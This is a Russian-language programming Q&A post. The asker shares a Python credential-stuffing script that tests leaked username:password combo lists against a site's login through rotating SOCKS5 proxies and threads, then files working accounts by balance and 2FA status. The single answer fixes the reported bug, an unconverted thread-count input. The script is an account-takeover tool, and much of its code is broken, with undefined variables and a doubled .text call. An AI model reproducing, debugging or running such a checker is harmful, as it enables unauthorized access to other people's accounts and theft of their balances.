# 'str' object cannot be interpreted as an integer в чем проблема?

Tags: python, python-3.x, requests

> for _ in range(threadcountinp): TypeError: 'str' object cannot be
> interpreted as an integer

код:

```
from bs4 import BeautifulSoup
import requests
import random
import threading
from threading import Thread

file = open(input("Your combo list:")).readlines()
proxylist = open(input("Your proxy list:")).readlines()
threadcountinp = input("Thread count:")
threadcount = threadcountinp
proxy = random.choice(proxylist)

proxies = {
    'http': 'socks5://{}'.format(proxy),
    'https': 'socks5://{}'.format(proxy),
      }

def thread():
    while file:
        to_check = file[0]
        file.remove(to_check)
        try:
            check(to_check)
        except Exception as e:
            print("Ошибка:", e)

base_url = "https://site.com/"
parse_url = "https://site2.com/"

def check(account):
    user = account.split(":")[0]
    passw = account.split(":")[1]

    try:
        headers = { 
                    "Accept-Language": "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7",
                    "Accept-Encoding": "gzip, deflate, br",
                    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36",
                    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary8iapwFLgbO1kO99c",
                    "DNT": "1",
                    "Connection": "keep-alive",
                    "Upgrade-Insecure-Requests": "1"
                     }
        params = {
                    "_username":user,
                    "_password":passw,
                    "_csrf_token":' ',
                    "recaptcha_params":' '
                     }
        send = requests.post(base_url, data=params, headers=headers, proxies=proxies, timeout=20).text
        if "/user\"}" in send.text:
            requests.get(parse_url, proxies=proxies, timeout=30)
            balanceaprv = login.split('balanceApproved":')[1].split(',')[0]
            phone = login.split('"phone":')[1].split(',')[0]
            if balanceaprv > 500 and phone == null :
                with open('valid.txt','a+') as inv:
                    inv.write(str(line) + '\n')
                if not phone == null:
                    with open('2fa.txt','a+') as inv:
                        inv.write(str(line) + '\n')
                if balanceaprv < 500:
                    with open('custom.txt','a+') as inv:
                        inv.write(str(line) + '\n')
        elif "{\"message\":\"" in send.text:
            with open('bads.txt','a+') as inv:
                inv.write(str(line) + '\n')
        else:
            with open('errorslist.txt','a+') as inv:
                inv.write(str(line) + '\n')
    except:
            with open('errorslistexcept.txt','a+') as inv:
                inv.write(str(line) + '\n')

for _ in range(threadcountinp):
    t = threading.Thread(target=thread)
    t.start()

file.close()
proxylist.close()
```

Answer (score 1):

```
threadcountinp = input("Thread count:")
threadcount = threadcountinp
```

а кто `str` в `int` переводить будет?

ошибка ровно об этом и говорит

```
for _ in range(threadcountinp)
```

а `threadcountinp` - строка, а должно быть число